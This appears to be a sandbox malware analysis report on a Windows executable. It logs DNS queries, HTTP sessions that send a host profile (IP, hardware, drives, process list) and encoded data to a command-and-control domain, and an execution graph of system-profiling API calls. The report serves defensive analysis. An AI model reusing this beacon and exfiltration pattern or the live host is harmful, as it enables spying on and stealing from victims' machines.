                                                    Dec 26, 2024 14:14:17.023552895 CET1.1.1.1192.168.2.40xd9c2No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                    Dec 26, 2024 14:14:22.210150003 CET1.1.1.1192.168.2.40x21a3No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                    Dec 26, 2024 14:14:26.923796892 CET1.1.1.1192.168.2.40x287bNo error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                    Dec 26, 2024 14:14:28.749574900 CET1.1.1.1192.168.2.40x5dc3No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                    • httpbin.org
                                                    • home.fiveth5ht.top
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.4497315.101.3.217802828C:\Users\user\Desktop\HrIrtCXI3s.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 26, 2024 14:14:22.332536936 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 503853
                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 30 34 37 34 36 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317047466", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                    Dec 26, 2024 14:14:22.452215910 CET2472OUTData Raw: 6e 56 67 37 61 32 6c 46 4f 77 31 5c 2f 75 6e 38 50 35 69 6f 61 74 62 57 59 5a 35 2b 70 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 2b 33 2b 66 77 72 39 67
                                                    Data Ascii: nVg7a2lFOw1\/un8P5ioatbWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9gvEn\/BJ3VfDF4IL740+ZZzOVs9Sh+Gpa1uRyQjZ8ffuLoKCZLWRi67WaNpodkz0rX\/AIJZLc4z8d\/LJ7f8Kw3f+9DXPOPev4PxH7TP6EWEr1MNifGqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD
                                                    Dec 26, 2024 14:14:22.452249050 CET4944OUTData Raw: 31 70 48 36 66 6a 5c 2f 51 30 47 6c 50 72 38 76 31 49 71 4b 4b 6a 6b 37 66 6a 5c 2f 41 45 6f 4e 43 4f 69 69 69 67 36 43 4f 54 74 2b 50 39 4b 6a 71 53 54 74 2b 50 38 41 53 6f 36 41 49 35 4f 33 34 31 48 55 72 39 50 78 5c 2f 77 41 61 69 6f 4f 67 6a
                                                    Data Ascii: 1pH6fj\/Q0GlPr8v1IqKKjk7fj\/AEoNCOiiig6COTt+P9KjqSTt+P8ASo6AI5O341HUr9Px\/wAaioOgjk7fj\/SoZe\/+9\/jVqoW6ffz\/AJ\/EfnQaU+vy\/Uq0VYqvWlPr8v1Oin1+X6kL\/eP4fyFNqxVdt5PCflwPyqvf\/u\/iaET9fw\/qaZViq9YnQV6a\/wB0\/h\/MVNJ2\/H+lR0HQV6Klfp+P9DUVRyLz\/r5
                                                    Dec 26, 2024 14:14:22.452265024 CET2472OUTData Raw: 63 6e 62 38 61 6b 70 47 42 62 38 38 31 5c 2f 30 54 6e 2b 44 42 42 52 55 75 77 65 5c 2f 2b 66 77 6f 32 44 33 5c 2f 7a 2b 46 41 45 56 66 30 63 5c 2f 77 44 42 43 35 69 50 41 76 37 52 49 48 62 78 5a 38 50 54 2b 65 6a 2b 4b 66 38 41 34 6d 76 35 79 39
                                                    Data Ascii: cnb8akpGBb881\/0Tn+DBBRUuwe\/+fwo2D3\/z+FAEVf0c\/wDBC5iPAv7RIHbxZ8PT+ej+Kf8A4mv5y9g9\/wDP4V\/RX\/wQwfHgr9owfNx4q+HJ4z30jxb6A+lfyp9MrXwTx3\/ZRcP\/APqRVP7X+gLJv6QuXJ2\/5JTif\/1GoH6S+C\/2rfGHxF8GeEviB4N\/Y6\/ab1jwl478MaD4y8K6v\/b\/AOyJp\/8AanhvxP
                                                    Dec 26, 2024 14:14:22.452306986 CET4944OUTData Raw: 34 68 2b 45 74 4c 38 53 33 7a 52 70 43 32 71 2b 49 76 42 56 72 38 57 76 41 32 75 61 79 38 55 59 57 47 4a 39 61 31 58 77 78 64 36 74 4a 48 41 6b 64 75 6a 33 68 57 33 69 69 68 43 52 72 2b 42 76 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 76 37 51 2b 68 78
                                                    Data Ascii: 4h+EtL8S3zRpC2q+IvBVr8WvA2uay8UYWGJ9a1Xwxd6tJHAkduj3hW3iihCRr+Bvl+\/wCn\/wBev7Q+hxlOO4f4A434ezJr69w\/4r8T5Ji4QnKdKnistyfhnC4qFFyStS+s06042jHmc5TcVKcj\/Oz6eWbYDiDxQ4C4iyyLWB4h8G+FM7w050406tXDZln3F2JwtSsot\/vfqk6EJXlJxUFBScYRI6Kk8v3\/AE\/+vUdf1s
                                                    Dec 26, 2024 14:14:22.452449083 CET4944OUTData Raw: 6c 5a 68 6c 66 2b 2b 31 41 4b 67 65 36 74 37 6d 76 35 50 7a 7a 78 4f 34 66 34 73 7a 7a 47 35 70 52 79 68 63 4c 30 4d 56 4f 6e 37 50 4c 36 54 2b 73 34 61 6b 34 55 4b 4e 4b 55 33 58 70 51 70 79 6e 58 78 45 36 63 73 54 69 71 73 73 4e 52 6a 50 45 56
                                                    Data Ascii: lZhlf++1AKge6t7mv5PzzxO4f4szzG5pRyhcL0MVOn7PL6T+s4ak4UKNKU3XpQpynXxE6csTiqssNRjPEVqlR6ykz+38j8JOKOEcgwGV184p8WYnCUpxq5jyfUcRXvWq1YxjhK1SpClRw8KkcPhqMMXWcKFGnCNkoxXyr+0VqHk+F9G05SQ1\/rQnYcfNDY2dwHU55x513bvwM5QcgZB+Otu3jGO\/rX0X+0Zq1nc+IdB0a2v7K
                                                    Dec 26, 2024 14:14:22.452503920 CET2472OUTData Raw: 2f 77 42 64 4a 66 31 36 66 35 78 30 70 6e 39 78 4e 73 66 50 58 74 35 50 30 6f 4f 34 68 6b 32 66 49 5c 2f 33 48 7a 5c 2f 7a 31 34 5c 2f 79 4f 33 62 38 4b 5a 38 5c 2f 33 30 54 66 5c 2f 41 4e 4f 5c 2f 34 44 38 7a 5c 2f 54 69 6e 44 37 6b 66 5c 2f 74
                                                    Data Ascii: /wBdJf16f5x0pn9xNsfPXt5P0oO4hk2fI\/3Hz\/z14\/yO3b8KZ8\/30Tf\/ANO\/4D8z\/TinD7kf\/tT\/AI+P8+tNP3nfnfH+68z\/ADk8n6UB7X+9+H\/AINvltv8A+2UUf+f89\/SovLSP9y6f\/q7\/ANB\/hVqST76D5+48yX9xx\/nv\/SoG2eZ86Sv+6Hm\/\/X5OP6GtPZ+f4f8ABOgZJ5P8Cb\/L\/wA+3p\/P0
                                                    Dec 26, 2024 14:14:22.452585936 CET2472OUTData Raw: 5c 2f 72 6e 69 73 7a 51 5a 75 38 76 65 34 51 62 5c 2f 4e 48 37 76 5c 2f 6e 74 39 50 35 66 35 35 4e 72 79 66 4f 6e 6d 62 2b 5a 50 39 61 66 33 33 76 61 57 67 70 36 35 56 6b 52 48 33 76 5c 2f 41 4b 33 7a 4a 4a 66 38 38 34 7a 55 52 62 6e 37 2b 79 45
                                                    Data Ascii: \/rniszQZu8ve4Qb\/NH7v\/nt9P5f55NryfOnmb+ZP9af33vaWgp65VkRH3v\/AK3zJJf884zURbn7+yEy\/vf+eGc\/56fl6aez8\/w\/4J0H7u0VieJNes\/DGh6lr+oHFlpdubm4O4LiMOqfeIIHLjnBrtvinpGjfCu4+IlpL8V\/g38Q734NfFvw58EPjTpPw31r4kvrHwn+IXi\/TvFepeFtN8U23xL+E3wxstU0\/XE8
                                                    Dec 26, 2024 14:14:22.572017908 CET2472OUTData Raw: 74 74 55 41 30 59 39 31 34 61 68 31 50 78 68 59 2b 41 4e 52 38 4f 66 38 49 39 64 51 5c 2f 45 58 34 6b 5c 2f 45 44 34 5a 36 56 46 66 2b 4a 49 74 44 62 52 4c 76 34 56 5c 2f 44 76 77 6a 38 56 76 69 46 34 79 38 59 36 6e 72 46 6a 5a 65 46 76 43 33 77
                                                    Data Ascii: ttUA0Y914ah1PxhY+ANR8Of8I9dQ\/EX4k\/ED4Z6VFf+JItDbRLv4V\/Dvwj8VviF4y8Y6nrFjZeFvC3w58I+A\/GFp4h17xbqfiOOHSNP0vW7zU7SzsrSG6uvh8hz76PeR8Qcc+JPDWacI5VnXF9XIcr4+4iwFapg6Gc4vhvEcR4PJK2cJezy+pj8LWxef4OecOisVioUlhsbja9LAYKFD7bibgL6TWY5RwX4ZcU8Mca4\/L+
                                                    Dec 26, 2024 14:14:22.572069883 CET2472OUTData Raw: 46 72 66 32 6b 5c 2f 34 66 68 6c 38 42 78 39 64 45 2b 49 70 5c 2f 6c 38 53 31 72 38 32 5c 2f 77 42 6f 50 34 34 2b 4b 50 32 6a 76 69 31 34 6d 2b 4d 58 6a 48 54 39 41 30 54 78 4a 34 71 68 30 47 48 55 4e 50 38 41 44 45 47 6f 32 32 68 77 4c 34 65 38
                                                    Data Ascii: Frf2k\/4fhl8Bx9dE+Ip\/l8S1r82\/wBoP44+KP2jvi14m+MXjHT9A0TxJ4qh0GHUNP8ADEGo22hwL4e8PaV4ZsjYwatqWsajH5un6Pay3P2jUrrfePcSxGGF47eL58tvEGjxaV8S9b8ZeKPB3wo0z4M\/E3wL8JPivcfEm58bpN4I8Y+Pk+JQ0+3v9J+Hfw\/+I+vXttpV18K\/E1jrf9l6Te30Fy+ntYWGo2sl5cWPqeveC\
                                                    Dec 26, 2024 14:14:22.572089911 CET4944OUTData Raw: 31 5c 2f 41 72 34 76 48 34 50 4c 59 33 50 78 57 38 4e 66 43 54 78 56 34 38 31 72 58 5c 2f 41 2b 6b 58 57 76 32 76 68 4b 39 38 53 6a 55 50 46 48 77 75 38 48 65 41 76 69 4a 34 55 30 48 78 64 71 4f 6c 65 48 64 65 38 54 5c 2f 42 62 78 78 38 55 4e 44
                                                    Data Ascii: 1\/Ar4vH4PLY3PxW8NfCTxV481rX\/A+kXWv2vhK98SjUPFHwu8HeAviJ4U0HxdqOleHde8T\/Bbxx8UNDsJtX0zXPt0vhG7TxFX6XwFn3gL4d5ZLh\/gXOMrynLsyzP8AtStg4Y\/Pczf9oY3Lslg8Xiq+a1cficDSqYCrkkG8RWw2Dpyr4aLUMTiJKp+UeI\/C30l\/FbPKfEPiFw9nee51lmVUMkw2LeV8O5TzZfh80z6eGw
                                                    Dec 26, 2024 14:14:26.518847942 CET157INHTTP/1.1 200 OK
                                                    Server: nginx/1.22.1
                                                    Date: Thu, 26 Dec 2024 13:14:26 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 1
                                                    Connection: close
                                                    Data Raw: 30
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.4497325.101.3.217802828C:\Users\user\Desktop\HrIrtCXI3s.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 26, 2024 14:14:27.045270920 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Dec 26, 2024 14:14:28.560333967 CET372INHTTP/1.1 404 NOT FOUND
                                                    Server: nginx/1.22.1
                                                    Date: Thu, 26 Dec 2024 13:14:28 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 207
                                                    Connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.4497335.101.3.217802828C:\Users\user\Desktop\HrIrtCXI3s.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 26, 2024 14:14:28.871701002 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                    Data Ascii: { "id1": "0", "data": "Done1" }
                                                    Dec 26, 2024 14:14:30.490881920 CET372INHTTP/1.1 404 NOT FOUND
                                                    Server: nginx/1.22.1
                                                    Date: Thu, 26 Dec 2024 13:14:30 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 207
                                                    Connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.44973034.226.108.1554432828C:\Users\user\Desktop\HrIrtCXI3s.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-26 13:14:18 UTC52OUTGET /ip HTTP/1.1
                                                    Host: httpbin.org
                                                    Accept: */*
                                                    2024-12-26 13:14:19 UTC224INHTTP/1.1 200 OK
                                                    Date: Thu, 26 Dec 2024 13:14:19 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Connection: close
                                                    Server: gunicorn/19.9.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Credentials: true
                                                    2024-12-26 13:14:19 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                    Data Ascii: { "origin": "8.46.123.189"}


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Target ID:0
                                                    Start time:08:14:14
                                                    Start date:26/12/2024
                                                    Path:C:\Users\user\Desktop\HrIrtCXI3s.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\HrIrtCXI3s.exe"
                                                    Imagebase:0x4d0000
                                                    File size:4'476'416 bytes
                                                    MD5 hash:629763EB39D91BB69848475C90AD1E63
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:3.9%
                                                      Dynamic/Decrypted Code Coverage:24.5%
                                                      Signature Coverage:11.1%
                                                      Total number of Nodes:685
                                                      Total number of Limit Nodes:86
                                                      execution_graph 73833 508b50 73834 508b6b 73833->73834 73862 508be6 73833->73862 73835 508bf3 73834->73835 73836 508b8f 73834->73836 73834->73862 73866 50a550 73835->73866 73937 4e6e40 select 73836->73937 73840 508cd9 SleepEx getsockopt 73842 508d18 73840->73842 73841 508e85 73847 508eae 73841->73847 73841->73862 73943 4e2a00 _open 73841->73943 73846 508d43 73842->73846 73848 508cb2 73842->73848 73843 50a150 2 API calls 73854 508dff 73843->73854 73844 508c35 73925 50a150 73844->73925 73845 508c1f connect 73845->73844 73853 50a150 2 API calls 73846->73853 73847->73862 73944 4d78b0 closesocket 73847->73944 73848->73841 73848->73843 73848->73862 73852 508bb5 73852->73862 73939 5150a0 _open 73852->73939 73853->73852 73854->73841 73941 4ed090 _open 73854->73941 73855 508c8b 73857 508dc8 73855->73857 73858 508ba1 73855->73858 73940 50b100 _open 73857->73940 73858->73840 73858->73848 73858->73852 73861 508e67 73942 514fd0 _open 73861->73942 73867 50a575 73866->73867 73869 50a597 73867->73869 73948 4d75e0 73867->73948 73918 50a6d9 73869->73918 73960 50ef30 73869->73960 73871 50a709 73873 4d78b0 2 API calls 73871->73873 73881 50a713 73871->73881 73873->73881 73874 508bfc 73874->73844 73874->73845 73874->73848 73874->73862 73876 50a7e5 73880 50a811 setsockopt 73876->73880 73886 50a87c 73876->73886 73896 50a8ee 73876->73896 73878 50a641 73878->73876 73974 514fd0 _open 73878->73974 73880->73886 73889 50a83b 73880->73889 73881->73874 73973 5150a0 _open 73881->73973 73882 50a69b 73970 4ed090 _open 73882->73970 73884 50a6c9 73971 514f40 _open 73884->73971 73886->73896 73977 50b1e0 _open 73886->73977 73889->73886 73975 4ed090 _open 73889->73975 73890 50af56 73892 50af5d 73890->73892 73890->73918 73892->73881 73895 50a150 2 API calls 73892->73895 73893 50a86d 73976 514fd0 _open 73893->73976 73895->73881 73898 50abb9 73896->73898 73899 50ae32 73896->73899 73900 50acb8 73896->73900 73904 50af33 73896->73904 73896->73918 73920 50abe1 73896->73920 73897 50b056 73988 4ed090 _open 73897->73988 73902 50ad45 73898->73902 73907 50ade6 73898->73907 73898->73920 73979 506be0 9 API calls 73898->73979 73899->73898 73985 514fd0 _open 73899->73985 73900->73898 73906 50acdc 73900->73906 73900->73918 73901 50af03 73901->73904 73986 514fd0 _open 73901->73986 73902->73907 73910 50ad5f 73902->73910 73969 5367e0 ioctlsocket 73904->73969 73978 4ed090 _open 73906->73978 73983 4ed090 _open 73907->73983 73980 5220d0 _open 73910->73980 73913 50b07b 73989 514f40 _open 73913->73989 73914 50ad7b 73916 50adb7 73914->73916 73981 514fd0 _open 73914->73981 73982 523030 _open 73916->73982 73918->73871 73918->73881 73972 4e2a00 _open 73918->73972 73920->73897 73920->73901 73920->73918 73987 514fd0 _open 73920->73987 73921 50ad01 73984 514f40 _open 73921->73984 73926 508c4d 73925->73926 73927 50a15f 73925->73927 73926->73855 73938 5150a0 _open 73926->73938 73927->73926 73928 50a181 getsockname 73927->73928 73929 50a1d0 73928->73929 73930 50a1f7 73928->73930 73996 4ed090 _open 73929->73996 73931 50ef30 _open 73930->73931 73935 50a20f 73931->73935 73933 50a1eb 73998 514f40 _open 73933->73998 73935->73926 73997 4ed090 _open 73935->73997 73937->73858 73938->73855 73939->73862 73940->73848 73941->73861 73942->73841 73943->73847 73945 4d78d7 73944->73945 73946 4d78c5 73944->73946 73945->73862 73999 4d72a0 _open 73946->73999 73949 4d75ef 73948->73949 73950 4d7607 socket 73948->73950 73949->73950 73953 4d7601 73949->73953 73954 4d7643 73949->73954 73951 4d763a 73950->73951 73952 4d762b 73950->73952 73951->73869 73990 4d72a0 _open 73952->73990 73953->73950 73991 4d72a0 _open 73954->73991 73957 4d7654 73992 4dcb20 _open 73957->73992 73959 4d7674 73959->73869 73961 50ef47 73960->73961 73962 50efa8 73960->73962 73963 50ef81 73961->73963 73964 50ef4c 73961->73964 73968 50a63a 73962->73968 73995 4dc960 _open 73962->73995 73994 533d10 _open 73963->73994 73964->73968 73993 533d10 _open 73964->73993 73968->73878 73968->73882 73969->73890 73970->73884 73971->73918 73972->73871 73973->73874 73974->73876 73975->73893 73976->73886 73977->73896 73978->73921 73979->73902 73980->73914 73981->73916 73982->73920 73983->73921 73984->73918 73985->73898 73986->73904 73987->73920 73988->73913 73989->73918 73990->73951 73991->73957 73992->73959 73993->73968 73994->73968 73995->73968 73996->73933 73997->73933 73998->73926 73999->73945 74515 5095b0 74516 5095c8 74515->74516 74518 5095fd 74515->74518 74517 50a150 2 API calls 74516->74517 74516->74518 74517->74518 74519 506ab0 74520 506ad5 74519->74520 74521 506bb4 74520->74521 74522 4e6fa0 select 74520->74522 74523 585ed0 7 API calls 74521->74523 74524 506b54 74522->74524 74525 506ba9 74523->74525 74524->74521 74524->74525 74526 506b5d 74524->74526 74526->74525 74528 585ed0 74526->74528 74531 585a50 74528->74531 74530 585ee5 74530->74526 74532 585a58 74531->74532 74537 585ea0 74531->74537 74533 585a99 74532->74533 74534 585b50 74532->74534 74542 585b88 74532->74542 74533->74542 74547 5870a0 6 API calls 74533->74547 74561 586f10 socket ioctlsocket connect getsockname closesocket 74533->74561 74538 585b7a 74534->74538 74539 585eb4 74534->74539 74534->74542 74535 585e96 74564 599480 socket ioctlsocket connect getsockname closesocket 74535->74564 74537->74530 74554 5870a0 74538->74554 74565 586f10 socket ioctlsocket connect getsockname closesocket 74539->74565 74548 585cae 74542->74548 74562 585ef0 socket ioctlsocket connect getsockname 74542->74562 74543 585ec2 74543->74543 74547->74533 74548->74535 74550 59a920 74548->74550 74563 599320 socket ioctlsocket connect getsockname closesocket 74548->74563 74551 59a944 74550->74551 74552 59a94b 74551->74552 74553 59a977 send 74551->74553 74552->74548 74553->74548 74558 5870ae 74554->74558 74556 5871a7 74556->74542 74557 58717f 74557->74556 74571 599320 socket ioctlsocket connect getsockname closesocket 74557->74571 74558->74556 74558->74557 74566 59a8c0 74558->74566 74570 5871c0 socket ioctlsocket connect getsockname 74558->74570 74561->74533 74562->74542 74563->74548 74564->74537 74565->74543 74567 59a903 recvfrom 74566->74567 74568 59a8e6 74566->74568 74569 59a8ed 74567->74569 74568->74567 74568->74569 74569->74558 74570->74558 74571->74556 74000 4d13c9 74004 4d1160 74000->74004 74003 4d13a1 74004->74003 74005 8593e0 74004->74005 74015 858a20 10 API calls 74004->74015 74012 859400 74005->74012 74014 8593f3 74005->74014 74006 859688 74007 8596c7 74006->74007 74006->74014 74016 859280 vfprintf 74006->74016 74017 859220 vfprintf 74007->74017 74010 8596df 74010->74004 74011 859220 vfprintf 74011->74012 74012->74006 74012->74007 74012->74011 74013 859280 vfprintf 74012->74013 74012->74014 74013->74012 74014->74004 74015->74004 74016->74006 74017->74010 74018 95f250 74019 95f282 74018->74019 74020 95f28e 74019->74020 74023 858f70 74019->74023 74022 95f297 74030 858e90 _open 74023->74030 74025 858f82 74026 858e90 _open 74025->74026 74027 858fa2 74026->74027 74028 858f70 _open 74027->74028 74029 858fb8 74028->74029 74029->74022 74031 858eba 74030->74031 74031->74025 74572 957830 74573 95785a 74572->74573 74574 957866 74573->74574 74575 858f70 _open 74573->74575 74576 95786f 74575->74576 74582 8612c0 74576->74582 74579 9578a6 74580 858f70 _open 74581 9578af 74580->74581 74583 8612cc 74582->74583 74586 85e050 74583->74586 74585 8612fa 74585->74579 74585->74580 74593 85e09d 74586->74593 74603 85e503 74586->74603 74587 85fee7 74604 85dff0 ungetc 74587->74604 74588 85e18e 74591 85ed90 ungetc 74588->74591 74599 85e1a6 74588->74599 74590 860250 ungetc 74590->74603 74591->74599 74592 8611a4 ungetc 74592->74603 74593->74588 74597 85e388 74593->74597 74598 85e243 74593->74598 74593->74599 74593->74603 74594 860742 ungetc 74594->74599 74595 8608d7 ungetc 74595->74603 74597->74599 74602 8600b8 ungetc 74597->74602 74597->74603 74598->74594 74598->74599 74599->74585 74600 860006 ungetc 74600->74603 74601 860e3e ungetc 74601->74603 74602->74597 74603->74587 74603->74590 74603->74592 74603->74595 74603->74598 74603->74599 74603->74600 74603->74601 74605 85dff0 ungetc 74603->74605 74604->74599 74605->74603 74606 72603cb Process32NextW 74607 72603e5 74606->74607 74608 4ed5e0 74609 4ed652 WSAStartup 74608->74609 74611 4ed5f0 74608->74611 74610 4ed664 74609->74610 74609->74611 74613 4ed67c 74611->74613 74615 4ed690 _open 74611->74615 74614 4ed5fa 74615->74614 74032 4d255d 74080 859f70 74032->74080 74035 4d2589 74036 4d25a0 GlobalMemoryStatusEx 74035->74036 74037 4d25ec 74036->74037 74082 72101e0 74037->74082 74088 72102c3 74037->74088 74092 72101d9 74037->74092 74098 721025e 74037->74098 74104 7210097 74037->74104 74110 7210396 74037->74110 74114 7210354 74037->74114 74118 7210057 74037->74118 74125 7210112 74037->74125 74131 7210152 74037->74131 74137 72102cf 74037->74137 74141 7210193 74037->74141 74147 721004b 74037->74147 74155 721024f 74037->74155 74161 7210008 74037->74161 74170 721020b 74037->74170 74176 72103c7 74037->74176 74180 7210346 74037->74180 74184 721016f 74037->74184 74190 7210284 74037->74190 74196 72101fe 74037->74196 74202 7210000 74037->74202 74212 721023f 74037->74212 74218 721013f 74037->74218 74224 7210278 74037->74224 74230 72100bc 74037->74230 74236 72100a5 74037->74236 74242 7210230 74037->74242 74248 7210367 74037->74248 74252 72101ac 74037->74252 74258 72102a2 74037->74258 74264 72100e4 74037->74264 74270 72101e5 74037->74270 74038 4d2762 74041 4d27d6 KiUserCallbackDispatcher 74038->74041 74039 4d263c GetDriveTypeA 74040 4d2655 GetDiskFreeSpaceExA 74039->74040 74042 4d261b 74039->74042 74040->74042 74043 4d27f8 74041->74043 74042->74038 74042->74039 74044 4d28d9 FindFirstFileW 74043->74044 74045 4d2906 FindNextFileW 74044->74045 74046 4d2928 74044->74046 74045->74045 74045->74046 74081 4d256c GetSystemInfo 74080->74081 74081->74035 74083 72101e9 74082->74083 74084 72102c3 GetLogicalDrives 74083->74084 74085 72102b7 GetLogicalDrives 74084->74085 74087 7210413 74085->74087 74087->74042 74089 72102d5 GetLogicalDrives 74088->74089 74091 7210413 74089->74091 74091->74042 74093 72101f0 74092->74093 74094 72102c3 GetLogicalDrives 74093->74094 74095 72102b7 GetLogicalDrives 74094->74095 74097 7210413 74095->74097 74097->74042 74099 721026c 74098->74099 74100 72102c3 GetLogicalDrives 74099->74100 74101 72102b7 GetLogicalDrives 74100->74101 74103 7210413 74101->74103 74103->74042 74105 72100ae 74104->74105 74106 72102c3 GetLogicalDrives 74105->74106 74107 72102b7 GetLogicalDrives 